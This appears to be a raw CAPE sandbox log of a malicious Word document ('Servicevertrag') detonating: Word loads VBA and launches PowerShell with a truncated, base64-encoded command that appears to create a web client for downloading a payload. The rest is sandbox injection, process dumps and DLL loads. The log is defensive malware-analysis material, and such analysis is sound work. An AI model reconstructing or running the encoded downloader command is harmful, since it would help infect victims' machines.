2019-02-11 14:54:42,529 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-02-11 14:54:42,543 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:42,543 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:42,543 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:42,543 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 828 at 0x74940000, image base 0x2fbf0000, stack from 0x366000-0x370000
2019-02-11 14:54:42,543 [root] DEBUG: Commandline: C:\Users\user\Desktop\"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" \n "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\Servicevertrag[1].doc".
2019-02-11 14:54:42,543 [root] INFO: Monitor successfully loaded in process with pid 828.
2019-02-11 14:54:42,543 [root] DEBUG: DLL loaded at 0x748A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\Comctl32 (0x84000 bytes).
2019-02-11 14:54:42,559 [root] DEBUG: DLL loaded at 0x71700000: C:\Program Files (x86)\Microsoft Office\Office14\wwlib (0x127b000 bytes).
2019-02-11 14:54:42,575 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-02-11 14:54:42,575 [root] DEBUG: DLL loaded at 0x71550000: C:\Program Files (x86)\Microsoft Office\Office14\gfx (0x1ab000 bytes).
2019-02-11 14:54:42,591 [root] DEBUG: DLL loaded at 0x73DF0000: C:\Windows\system32\WTSAPI32 (0xd000 bytes).
2019-02-11 14:54:42,591 [root] DEBUG: DLL loaded at 0x73FC0000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-02-11 14:54:42,607 [root] DEBUG: DLL loaded at 0x701B0000: C:\Program Files (x86)\Microsoft Office\Office14\oart (0x1392000 bytes).
2019-02-11 14:54:42,638 [root] DEBUG: DLL unloaded from 0x73EE0000.
2019-02-11 14:54:42,809 [root] DEBUG: DLL loaded at 0x6EFC0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-02-11 14:54:42,825 [root] DEBUG: DLL loaded at 0x72980000: C:\Windows\system32\msi (0x240000 bytes).
2019-02-11 14:54:42,841 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-02-11 14:54:43,184 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-02-11 14:54:43,230 [root] DEBUG: DLL loaded at 0x6EBB0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-02-11 14:54:43,323 [root] DEBUG: DLL loaded at 0x73D20000: C:\Program Files (x86)\Microsoft Office\Office14\1033\wwintl (0xc9000 bytes).
2019-02-11 14:54:43,401 [root] DEBUG: DLL loaded at 0x6E940000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-02-11 14:54:43,401 [root] DEBUG: DLL loaded at 0x6A410000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-02-11 14:54:43,434 [root] DEBUG: DLL unloaded from 0x75140000.
2019-02-11 14:54:43,480 [root] DEBUG: DLL loaded at 0x72CC0000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-02-11 14:54:43,823 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:43,855 [root] DEBUG: DLL loaded at 0x72EB0000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS (0xbc000 bytes).
2019-02-11 14:54:44,010 [root] DEBUG: DLL loaded at 0x73F00000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-02-11 14:54:44,181 [root] DEBUG: DLL loaded at 0x72CF0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-02-11 14:54:44,229 [root] INFO: Announced 32-bit process name:  pid: 54290137
2019-02-11 14:54:44,229 [root] INFO: Added new process to list with pid: 54290137
2019-02-11 14:54:44,229 [lib.api.process] WARNING: The process with pid 54290137 is not alive, injection aborted
2019-02-11 14:54:44,229 [root] DEBUG: DLL loaded at 0x73EA0000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-02-11 14:54:44,229 [root] DEBUG: set_caller_info: Adding region at 0x00270000 to caller regions list (advapi32::RegQueryInfoKeyW).
2019-02-11 14:54:44,229 [root] DEBUG: set_caller_info: Adding region at 0x01FF0000 to caller regions list (advapi32::RegOpenKeyExW).
2019-02-11 14:54:44,229 [root] DEBUG: set_caller_info: Adding region at 0x00540000 to caller regions list (kernel32::FindFirstFileExW).
2019-02-11 14:54:44,229 [root] DEBUG: DLL loaded at 0x73CA0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-02-11 14:54:44,354 [root] DEBUG: DLL loaded at 0x73C80000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-02-11 14:54:44,509 [root] DEBUG: DLL loaded at 0x6A3B0000: C:\Windows\system32\Winspool.DRV (0x51000 bytes).
2019-02-11 14:54:44,588 [root] INFO: Process with pid 54290137 has terminated
2019-02-11 14:54:44,604 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-02-11 14:54:44,604 [root] DEBUG: DLL unloaded from 0x75140000.
2019-02-11 14:54:44,604 [root] DEBUG: DLL loaded at 0x6A380000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-02-11 14:54:44,604 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-02-11 14:54:44,604 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-02-11 14:54:44,604 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-02-11 14:54:44,604 [root] DEBUG: DLL unloaded from 0x6A380000.
2019-02-11 14:54:44,634 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-02-11 14:54:44,634 [root] DEBUG: DLL loaded at 0x6A240000: C:\Windows\system32\explorerframe (0x16f000 bytes).
2019-02-11 14:54:44,634 [root] DEBUG: DLL loaded at 0x6A210000: C:\Windows\system32\DUser (0x2f000 bytes).
2019-02-11 14:54:44,634 [root] DEBUG: DLL loaded at 0x6A150000: C:\Windows\system32\DUI70 (0xb2000 bytes).
2019-02-11 14:54:44,634 [root] DEBUG: DLL unloaded from 0x6A240000.
2019-02-11 14:54:44,775 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-02-11 14:54:44,775 [root] DEBUG: DLL unloaded from 0x2FBF0000.
2019-02-11 14:54:44,775 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-02-11 14:54:44,775 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-02-11 14:54:44,775 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-02-11 14:54:44,775 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-02-11 14:54:44,775 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-02-11 14:54:44,790 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-02-11 14:54:44,790 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-02-11 14:54:44,852 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-02-11 14:54:44,852 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-02-11 14:54:44,852 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-02-11 14:54:44,977 [root] DEBUG: DLL loaded at 0x6A250000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-02-11 14:54:45,493 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\profapi (0xb000 bytes).
2019-02-11 14:54:45,696 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-02-11 14:54:45,696 [root] DEBUG: DLL loaded at 0x74830000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-02-11 14:54:45,696 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-02-11 14:54:45,757 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-02-11 14:54:45,757 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-02-11 14:54:45,757 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-02-11 14:54:45,757 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-02-11 14:54:46,256 [root] DEBUG: DLL loaded at 0x6A0C0000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus (0x190000 bytes).
2019-02-11 14:54:46,288 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:46,351 [root] DEBUG: DLL loaded at 0x69FC0000: C:\Windows\system32\WindowsCodecs (0xfb000 bytes).
2019-02-11 14:54:46,444 [root] DEBUG: DLL loaded at 0x69F20000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10 (0x9e000 bytes).
2019-02-11 14:54:47,131 [root] DEBUG: DLL loaded at 0x73E30000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-02-11 14:54:47,240 [root] DEBUG: DLL loaded at 0x72E40000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-02-11 14:54:48,301 [root] DEBUG: DLL loaded at 0x69C90000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-02-11 14:54:48,315 [root] DEBUG: set_caller_info: Adding region at 0x00140000 to caller regions list (ntdll::memcpy).
2019-02-11 14:54:48,332 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-02-11 14:54:48,332 [root] DEBUG: set_caller_info: Adding region at 0x07590000 to caller regions list (ntdll::memcpy).
2019-02-11 14:54:48,394 [root] DEBUG: set_caller_info: Adding region at 0x05C20000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-02-11 14:54:48,394 [root] DEBUG: set_caller_info: Adding region at 0x06100000 to caller regions list (ntdll::memcpy).
2019-02-11 14:54:48,394 [root] DEBUG: set_caller_info: Adding region at 0x00020000 to caller regions list (ntdll::memcpy).
2019-02-11 14:54:48,426 [root] DEBUG: set_caller_info: Adding region at 0x005C0000 to caller regions list (ntdll::memcpy).
2019-02-11 14:54:48,426 [root] DEBUG: set_caller_info: Adding region at 0x00450000 to caller regions list (advapi32::RegCloseKey).
2019-02-11 14:54:48,457 [root] DEBUG: set_caller_info: Adding region at 0x061D0000 to caller regions list (kernel32::GetLocalTime).
2019-02-11 14:54:48,457 [root] DEBUG: set_caller_info: Adding region at 0x06160000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-02-11 14:54:48,519 [root] DEBUG: set_caller_info: Adding region at 0x00790000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-02-11 14:54:48,628 [root] INFO: Announced 32-bit process name: powershell.exe pid: 2708
2019-02-11 14:54:48,628 [root] INFO: Added new process to list with pid: 2708
2019-02-11 14:54:48,628 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:54:48,628 [lib.api.process] INFO: 32-bit DLL to inject is C:\tsbvpo\dll\EWdjDWLc.dll, loader C:\tsbvpo\bin\GzFLMqR.exe
2019-02-11 14:54:48,644 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2708
2019-02-11 14:54:48,660 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:48,660 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:48,674 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:48,674 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2708 at 0x74940000, image base 0x21c30000, stack from 0xa6000-0xb0000
2019-02-11 14:54:48,674 [root] DEBUG: Commandline: C:\Users\user\Desktop\POwershell -e JABCAE0AMAB6ADIAdwBwAGkAPQAoACcAcABRADQAMAAnACsAJwBKAEQAVgBWACcAKQA7ACQAUQA5AG8AdQBuAEYASgBCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AOAAxAFAASQBVAHoAaAA9ACgAJwBoACcAKwAn
2019-02-11 14:54:48,674 [root] INFO: Monitor successfully loaded in process with pid 2708.
2019-02-11 14:54:48,674 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-02-11 14:54:48,674 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\system32\shell32 (0xc4a000 bytes).
2019-02-11 14:54:48,690 [root] DEBUG: DLL loaded at 0x72C50000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-02-11 14:54:48,690 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\profapi (0xb000 bytes).
2019-02-11 14:54:48,690 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-02-11 14:54:48,690 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-02-11 14:54:48,690 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-02-11 14:54:48,690 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-02-11 14:54:48,690 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-02-11 14:54:48,706 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-02-11 14:54:48,706 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-02-11 14:54:48,706 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-02-11 14:54:48,737 [root] DEBUG: DLL loaded at 0x69B20000: C:\Windows\system32\explorerframe (0x16f000 bytes).
2019-02-11 14:54:48,737 [root] DEBUG: DLL loaded at 0x69AF0000: C:\Windows\system32\DUser (0x2f000 bytes).
2019-02-11 14:54:48,737 [root] DEBUG: DLL loaded at 0x69A30000: C:\Windows\system32\DUI70 (0xb2000 bytes).
2019-02-11 14:54:48,908 [root] DEBUG: DLL loaded at 0x73EF0000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2019-02-11 14:54:48,940 [root] DEBUG: DLL loaded at 0x699C0000: C:\Windows\system32\ntshrui (0x70000 bytes).
2019-02-11 14:54:48,940 [root] DEBUG: DLL loaded at 0x699A0000: C:\Windows\system32\srvcli (0x19000 bytes).
2019-02-11 14:54:48,971 [root] DEBUG: DLL loaded at 0x73C70000: C:\Windows\system32\cscapi (0xb000 bytes).
2019-02-11 14:54:49,033 [root] DEBUG: DLL loaded at 0x72EA0000: C:\Windows\system32\slc (0xa000 bytes).
2019-02-11 14:54:49,407 [root] DEBUG: DLL loaded at 0x69960000: C:\Program Files (x86)\Microsoft Office\Office14\msproof7 (0x39000 bytes).
2019-02-11 14:54:49,454 [root] INFO: Announced 32-bit process name:  pid: 1
2019-02-11 14:54:49,454 [root] INFO: Added new process to list with pid: 1
2019-02-11 14:54:49,454 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-02-11 14:54:49,688 [root] INFO: Process with pid 1 has terminated
2019-02-11 14:54:49,720 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2228
2019-02-11 14:54:49,720 [root] DEBUG: GetHookCallerBase: thread 1040 (handle 0x0), return address 0x000D129E, allocation base 0x000D0000.
2019-02-11 14:54:49,720 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000D0000.
2019-02-11 14:54:49,720 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000D0000.
2019-02-11 14:54:49,720 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001C9A.
2019-02-11 14:54:49,923 [root] DEBUG: DLL unloaded from 0x73C80000.
2019-02-11 14:54:49,938 [root] INFO: Announced 32-bit process name:  pid: 1
2019-02-11 14:54:49,938 [root] INFO: Added new process to list with pid: 1
2019-02-11 14:54:49,938 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-02-11 14:54:49,938 [root] DEBUG: DLL unloaded from 0x75C10000.
2019-02-11 14:54:50,032 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-02-11 14:54:50,032 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-02-11 14:54:50,032 [root] DEBUG: set_caller_info: Adding region at 0x00070000 to caller regions list (advapi32::RegQueryInfoKeyW).
2019-02-11 14:54:50,032 [root] DEBUG: set_caller_info: Adding region at 0x01F00000 to caller regions list (advapi32::RegOpenKeyExW).
2019-02-11 14:54:50,032 [root] DEBUG: set_caller_info: Adding region at 0x00570000 to caller regions list (kernel32::FindFirstFileExW).
2019-02-11 14:54:50,032 [root] DEBUG: set_caller_info: Adding region at 0x77110000 to caller regions list (advapi32::RegOpenKeyExW).
2019-02-11 14:54:50,032 [root] DEBUG: DLL loaded at 0x73CA0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-02-11 14:54:50,095 [root] INFO: Announced starting service "osppsvc"
2019-02-11 14:54:50,095 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-02-11 14:54:50,095 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-02-11 14:54:50,095 [lib.api.process] INFO: 64-bit DLL to inject is C:\tsbvpo\dll\KHgFHNG.dll, loader C:\tsbvpo\bin\FYvljThn.exe
2019-02-11 14:54:50,109 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:50,109 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:50,109 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:50,109 [root] WARNING: Unable to place hook on LockResource
2019-02-11 14:54:50,109 [root] WARNING: Unable to hook LockResource
2019-02-11 14:54:50,109 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x0000000074000000, image base 0x00000000FFA10000, stack from 0x0000000002A76000-0x0000000002A80000
2019-02-11 14:54:50,109 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-02-11 14:54:50,109 [root] INFO: Added new process to list with pid: 460
2019-02-11 14:54:50,109 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-02-11 14:54:50,187 [root] DEBUG: DLL loaded at 0x693B0000: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks (0x5ab000 bytes).
2019-02-11 14:54:50,187 [root] DEBUG: DLL loaded at 0x73AE0000: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80 (0x9b000 bytes).
2019-02-11 14:54:50,203 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\2228_123418830449342011122019
2019-02-11 14:54:50,203 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa2a00.
2019-02-11 14:54:50,220 [root] DEBUG: DLL loaded at 0x688B0000: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni (0xaf8000 bytes).
2019-02-11 14:54:50,220 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-02-11 14:54:50,234 [root] DEBUG: DLL unloaded from 0x72980000.
2019-02-11 14:54:50,234 [root] DEBUG: DLL unloaded from 0x74110000.
2019-02-11 14:54:50,234 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:50,250 [root] DEBUG: DLL unloaded from 0x75140000.
2019-02-11 14:54:50,250 [root] DEBUG: DLL unloaded from 0x74870000.
2019-02-11 14:54:50,250 [root] INFO: Notified of termination of process with pid 2228.
2019-02-11 14:54:50,282 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 3028
2019-02-11 14:54:50,298 [root] DEBUG: GetHookCallerBase: thread 3032 (handle 0x0), return address 0x000D129E, allocation base 0x000D0000.
2019-02-11 14:54:50,298 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000D0000.
2019-02-11 14:54:50,298 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000D0000.
2019-02-11 14:54:50,298 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001C9A.
2019-02-11 14:54:50,312 [root] INFO: Added new CAPE file to list with path: C:\RTxelpCSMm\CAPE\3028_47844713850342011122019
2019-02-11 14:54:50,312 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa2a00.
2019-02-11 14:54:50,375 [root] DEBUG: set_caller_info: Adding region at 0x01CF0000 to caller regions list (kernel32::SetErrorMode).
2019-02-11 14:54:50,391 [root] DEBUG: set_caller_info: Adding region at 0x03E70000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-02-11 14:54:50,437 [root] DEBUG: DLL loaded at 0x68110000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni (0x79c000 bytes).
2019-02-11 14:54:50,437 [root] DEBUG: DLL loaded at 0x72BC0000: C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\b1c511d8fad78ad3c5213b2b4fb02b8b\Microsoft.PowerShell.ConsoleHost.ni (0x81000 bytes).
2019-02-11 14:54:50,469 [root] DEBUG: DLL unloaded from 0x74110000.
2019-02-11 14:54:50,469 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:50,469 [root] DEBUG: DLL unloaded from 0x75140000.
2019-02-11 14:54:50,484 [root] DEBUG: DLL unloaded from 0x74870000.
2019-02-11 14:54:50,484 [root] INFO: Notified of termination of process with pid 3028.
2019-02-11 14:54:50,484 [root] DEBUG: DLL loaded at 0x675A0000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4436815b432c313255af322f4ec3560d\System.Management.Automation.ni (0x87a000 bytes).
2019-02-11 14:54:50,532 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\version (0x9000 bytes).
2019-02-11 14:54:50,687 [root] DEBUG: DLL loaded at 0x67360000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\fbc05b5b05dc6366b02b8e2f77d080f1\System.Core.ni (0x235000 bytes).
2019-02-11 14:54:50,687 [root] DEBUG: DLL loaded at 0x74350000: C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\4f68cd04686e5dc5a55070d112d44bdf\Microsoft.PowerShell.Commands.Diagnostics.ni (0x4b000 bytes).
2019-02-11 14:54:50,703 [root] DEBUG: DLL loaded at 0x74800000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuratio#\f02737c83305687a68c088927a6c5a98\System.Configuration.Install.ni (0x25000 bytes).
2019-02-11 14:54:50,703 [root] INFO: Process with pid 3028 has terminated
2019-02-11 14:54:50,703 [root] INFO: Process with pid 1 has terminated
2019-02-11 14:54:50,703 [root] DEBUG: DLL loaded at 0x742C0000: C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.WSMan.Man#\ee28a075665b6bc23b6dae56903d431d\Microsoft.WSMan.Management.ni (0x85000 bytes).
2019-02-11 14:54:50,719 [root] DEBUG: DLL loaded at 0x74220000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\ad18f93fc713db2c4b29b25116c13bd8\System.Transactions.ni (0x9c000 bytes).
2019-02-11 14:54:50,733 [root] DEBUG: DLL loaded at 0x06430000: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x43000 bytes).
2019-02-11 14:54:50,750 [root] DEBUG: DLL loaded at 0x3F100000: C:\Program Files (x86)\Microsoft Office\OFFICE14\PROOF\1033\MSGR3EN (0x311000 bytes).
2019-02-11 14:54:50,780 [root] DEBUG: set_caller_info: Adding region at 0x082F0000 to caller regions list (advapi32::RegCreateKeyExA).
2019-02-11 14:54:50,812 [root] DEBUG: DLL loaded at 0x671C0000: C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\3008a05e2928e2c1d856cc34e0422c17\Microsoft.PowerShell.Commands.Utility.ni (0x19e000 bytes).
2019-02-11 14:54:50,858 [root] DEBUG: DLL loaded at 0x73BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\8df695fb80187f65208d87229e81e8a2\Microsoft.PowerShell.Commands.Management.ni (0xc3000 bytes).
2019-02-11 14:54:50,875 [root] DEBUG: DLL loaded at 0x740E0000: C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\8ce205027e30804d1b2deaffa0582735\Microsoft.PowerShell.Security.ni (0x2d000 bytes).
2019-02-11 14:54:50,890 [root] DEBUG: DLL loaded at 0x60340000: C:\Windows\Microsoft.NET\Framework\v2.0.50727\culture (0x8000 bytes).
2019-02-11 14:54:50,953 [root] DEBUG: DLL unloaded from 0x60340000.
2019-02-11 14:54:51,124 [root] DEBUG: set_caller_info: Adding region at 0x01EE0000 to caller regions list (ntdll::NtCreateEvent).
2019-02-11 14:54:51,155 [root] DEBUG: DLL loaded at 0x66C80000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni (0x536000 bytes).
2019-02-11 14:54:51,171 [root] DEBUG: DLL loaded at 0x66B70000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni (0x104000 bytes).
2019-02-11 14:54:51,171 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-02-11 14:54:51,171 [root] DEBUG: DLL loaded at 0x66A50000: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.DirectorySer#\45ec12795950a7d54691591c615a9e3c\System.DirectoryServices.ni (0x114000 bytes).
2019-02-11 14:54:51,187 [root] INFO: Announced 64-bit process name: OSPPSVC.EXE pid: 596
2019-02-11 14:54:51,201 [root] INFO: Added new process to list with pid: 596
2019-02-11 14:54:51,201 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:54:51,233 [lib.api.process] INFO: 64-bit DLL to inject is C:\tsbvpo\dll\KHgFHNG.dll, loader C:\tsbvpo\bin\FYvljThn.exe
2019-02-11 14:54:51,249 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 596
2019-02-11 14:54:51,249 [root] DEBUG: DLL loaded at 0x74210000: C:\Windows\system32\shfolder (0x5000 bytes).
2019-02-11 14:54:51,265 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:51,265 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:51,279 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:51,279 [root] WARNING: Unable to place hook on LockResource
2019-02-11 14:54:51,279 [root] WARNING: Unable to hook LockResource
2019-02-11 14:54:51,296 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 596 at 0x0000000074000000, image base 0x00000000FFC90000, stack from 0x00000000001F5000-0x0000000000200000
2019-02-11 14:54:51,296 [root] DEBUG: Commandline: C:\Windows\sysnative\"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE".
2019-02-11 14:54:51,296 [root] INFO: Monitor successfully loaded in process with pid 596.
2019-02-11 14:54:51,576 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-02-11 14:54:51,592 [root] DEBUG: DLL unloaded from 0x73C80000.
2019-02-11 14:54:51,592 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-02-11 14:54:51,608 [root] DEBUG: Timer callback hook: passing to callback at 0x00000000FFD16D7C.
2019-02-11 14:54:51,624 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-02-11 14:54:51,624 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
